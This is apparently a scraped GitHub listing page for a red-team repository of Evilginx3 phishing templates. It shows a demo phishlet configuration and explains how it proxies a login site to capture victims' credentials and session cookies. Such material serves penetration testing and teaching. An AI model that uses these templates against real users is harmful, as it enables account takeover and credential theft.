simplerhacking /
Evilginx3-Phishlets
This repository provides penetration testers and red teams with an extensive collection of dynamic phishing templates designed specifically for use with Evilginx3. May be updated periodically.
76/100 healthLoading repository data…
emmarktech / repository
This repository provides penetration testers and red teams with an extensive collection of dynamic phishing templates designed specifically for use with Evilginx3
A transparent discovery signal based on current public GitHub metadata.
This score does not audit code, security, maintainers, documentation quality, or suitability. Verify the repository and its current documentation before adoption.
Join group: https://t.me/evilginxgroup
Are you a programmer, cybersecurity enthusiast, or a red/blue team member ready to move beyond basic Evilginx setup? This course is built for those who want to get hands-on with advanced phishlet development—from the ground up. Whether you're an entry-level developer eager to learn the ins and outs of reverse-proxy phishing or an experienced security professional looking to refine your skills, this masterclass will take you step-by-step through building and customizing phishlets that work in real-world engagements.
name: 'Your First Phishlet'
author: 'Simpler Hacking'
min_ver: '3.2.0'
proxy_hosts:
- { phish_sub: 'www', orig_sub: 'www', domain: '{domain}', session: true, is_landing: true }
sub_filters:
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['text/html', 'application/javascript', 'text/css', 'application/json', 'image/x-icon', 'text/plain', 'application/xml', 'image/*', 'font/*']}
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['application/x-www-form-urlencoded']}
auth_tokens:
- domain: '{domain}'
keys: ['session']
creds:
- key: 'username'
search: ['(.*)']
type: 'post'
- key: 'password'
search: ['(.*)']
type: 'post'
auth_urls:
- url_regex: 'https://{hostname}/login'
valid_statuses: [200]
login:
username: user
password: pass
url: https://www.{domain}/login
# This is just a demo example of a phishlet for 3.2.0
Explanation of Phishlet Parameters:
name: Identifies the name of the phishlet.author: Specifies the phishlet author.min_ver: Specifies the minimum Evilginx version that is compatible with your phishlet.proxy_hosts: Indicates the domain and subdomains to proxy. The phish_sub is the subdomain that the phishing page will imitate.sub_filters: Allows the phishlet to replace instances of the actual domain name with the phishing domain, which is critical for the phishing page to function correctly.auth_tokens: Identifies the cookies that should be captured from the victim's browser to gain access to the victim's session.creds: This field determines the credentials that the phishlet is engineered to steal. The key is the name of the credential (like username or password) and search is a regular expression that the program will use to identify and extract these details from the user's input.Selected from shared topics, language and repository description—not editorial ratings.
simplerhacking /
This repository provides penetration testers and red teams with an extensive collection of dynamic phishing templates designed specifically for use with Evilginx3. May be updated periodically.
76/100 healthElNiak /
Welcome to the ultimate list of resources for AI in cybersecurity. This repository aims to provide an organized collection of high-quality resources to help professionals, researchers, and enthusiasts stay updated and advance their knowledge in the field.
80/100 healthauth_urls: Defines the URLs that Evilginx will treat as the authenticated URLs. After the victim logs in, Evilginx will look out for a redirect to one of these URLs, at which point it will steal the listed auth_tokens.login: Here you specify the identifiers of the username and password fields in the login form on the original webpage. The url is the link of the page where the victim enters their credentials.force_post: If set to true, it forces the alteration of HTTP method from GET to POST.is_landing: If set to true, it means that the page is a landing page for the phishing attack.js_inject: This is where you can write some JavaScript to be injected in the webpage. It's typically used to enhance the phishing attack and ensure a smoother victim experience.domain: This is a template variable used to replace target hostname used in phishlet configuration.The tools here are intended solely for legal and ethical use by cybersecurity professionals in controlled environments. Any illegal or malicious use is strictly prohibited. I disclaim all responsibility for any harm, loss, or damage that may arise from improper use.
CyberNexusX /
This repository contains a simple machine learning-based tool designed to detect potential cybersecurity threats by analyzing network traffic, logs, or system behavior. It leverages AI models to classify suspicious activities and provide alerts for potential security incidents.
56/100 healthss360-dev /
# SS 360 SAS - Open Source Security & AI Framework. This repository contains a subset of the core engineering utilities used by **SS 360 SAS** to power our Cybersecurity as a Service (CSaaS) infrastructure. Our goal is to provide the community with high-performance, asynchronous tools for AI orchestration and security observability.
60/100 healthsomaralsabbagh /
This repository provides an overview of selected cybersecurity and AI-related academic projects. Full implementations are kept private and are available upon request.
42/100 healthThis repository provides a practical guide for small and medium-sized enterprises (SMEs) to improve their cybersecurity system and how enhance it with the integration of A.I.
27/100 health